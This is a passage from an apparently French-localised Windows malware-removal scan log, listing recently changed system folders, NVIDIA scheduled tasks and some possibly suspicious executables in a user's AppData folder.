C:\ProgramData\Package Cache 2021-12-21 16:00 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2021-12-21 12:46 - 2021-11-29 19:44 - 000000000 ____D C:\ProgramData\Ableton 2021-12-21 12:43 - 2021-11-29 19:48 - 000000430 __RSH C:\ProgramData\ntuser.pol 2021-12-21 12:21 - 2021-03-20 13:32 - 000004308 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003976 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003940 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003894 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-03-20 13:32 - 000003654 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-12-21 12:21 - 2021-01-09 10:46 - 000001450 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2021-12-21 12:21 - 2021-01-09 10:45 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2021-12-21 12:21 - 2021-01-09 10:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2021-12-21 12:21 - 2021-01-09 10:43 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2021-12-19 12:12 - 2020-04-06 08:56 - 000000000 ____D C:\Program Files (x86)\Origin 2021-12-17 21:27 - 2021-03-20 13:32 - 000003522 _____ C:\WINDOWS\system32\Tasks\AdobeGCInvoker-1.0 2021-12-17 21:08 - 2021-09-17 17:34 - 000000000 ____D C:\Users\alexc\AppData\Local\MEGAsync 2021-12-17 18:49 - 2021-03-20 13:22 - 000440840 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2021-12-17 18:48 - 2019-12-07 15:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2021-12-17 18:48 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2021-12-17 15:00 - 2019-06-08 00:05 - 000000000 ____D C:\WINDOWS\system32\MRT 2021-12-17 14:56 - 2019-06-08 00:05 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2021-12-16 19:04 - 2019-06-07 21:55 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2021-12-15 18:41 - 2021-11-20 18:25 - 000116200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll 2021-12-15 18:41 - 2020-04-20 09:20 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll 2021-12-15 18:41 - 2019-12-14 13:14 - 000333288 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll 2021-12-15 18:41 - 2019-10-15 17:18 - 000062952 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe 2021-12-15 18:41 - 2019-06-21 15:47 - 002225640 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll 2021-12-15 18:41 - 2019-06-21 15:47 - 000217536 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll 2021-12-15 18:41 - 2019-06-21 15:47 - 000197048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll ==================== Fichiers à la racine de certains dossiers ======== 2020-05-07 11:12 - 2020-05-07 11:12 - 000000000 ____D () C:\ProgramData\WZUpdateNotifier.exe 2019-10-10 18:11 - 2020-11-04 08:53 - 000000117 _____ () C:\Users\alexc\AppData\Roaming\D2Info0 2019-10-10 18:11 - 2020-11-03 19:56 - 000000008 _____ () C:\Users\alexc\AppData\Roaming\DofusAppId0_1 2020-11-04 08:53 - 2020-11-04 09:10 - 000000008 _____ () C:\Users\alexc\AppData\Roaming\DofusAppId0_2 2022-01-08 15:58 - 2022-01-08 15:58 - 000012288 _____ () C:\Users\alexc\AppData\Roaming\e3dwefw.exe 2020-05-05 13:14 - 2020-05-10 09:04 - 040256815 _____ ( ) C:\Users\alexc\AppData\Roaming\InLog_setup.exe 2020-05-05 13:15 - 2020-05-05 13:16 - 048903224 _____ (WebDiscover Media ) C:\Users\alexc\AppData\Roaming\WebDiscovery_setup.exe 2022-01-08 15:58 - 2022-01-08 15:58 - 000108784 _____ () C:\Users\alexc\AppData\Roaming\whw.exe 2019-12-07 11:35 - 2019-12-07 11:35 - 000000036 _____ () C:\Users\alexc\AppData\Local\housecall.guid.cache 2020-02-15 15:45 - 2020-02-15 15:45 - 000000356 _____ () C:\Users\alexc\AppData\Local\karboncalligraphyrc 2020-02-14 18:25 - 2020-02-14 18:25 - 000000043 _____ () C:\Users\alexc\AppData\Local\klanguageoverridesrc 2020-02-14 16:16 - 2020-07-20 17:25 - 000242182 _____ () C:\Users\alexc\AppData\Local\krita.log 2020-07-20 16:34 - 2020-07-20 16:34 - 000000152 _____ () C:\Users\alexc\AppData\Local\kritadisplayrc 2020-02-14 16:17 - 2020-07-20 16:34 - 000021917 _____ () C:\Users\alexc\AppData\Local\kritarc 2019-10-03 18:06 - 2020-01-30 20:42 - 000005330 _____ () C:\Users\alexc\AppData\Local\oobelibMkey.log 2020-11-14 11:57 - 2020-11-15 19:13 - 000016438 _____ () C:\Users\alexc\AppData\Local\partner.bmp 2020-01-20 20:03 - 2021-01-03 13:33 - 000007602 _____ () C:\Users\alexc\AppData\Local\resmon.resmoncfg 2019-12-02 14:17 - 2019-12-02 14:17 - 000000153 _____ () C:\Users\alexc\AppData\Local\{9C196E6B-4F66-43C9-A99E-684C4D94A18B} ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)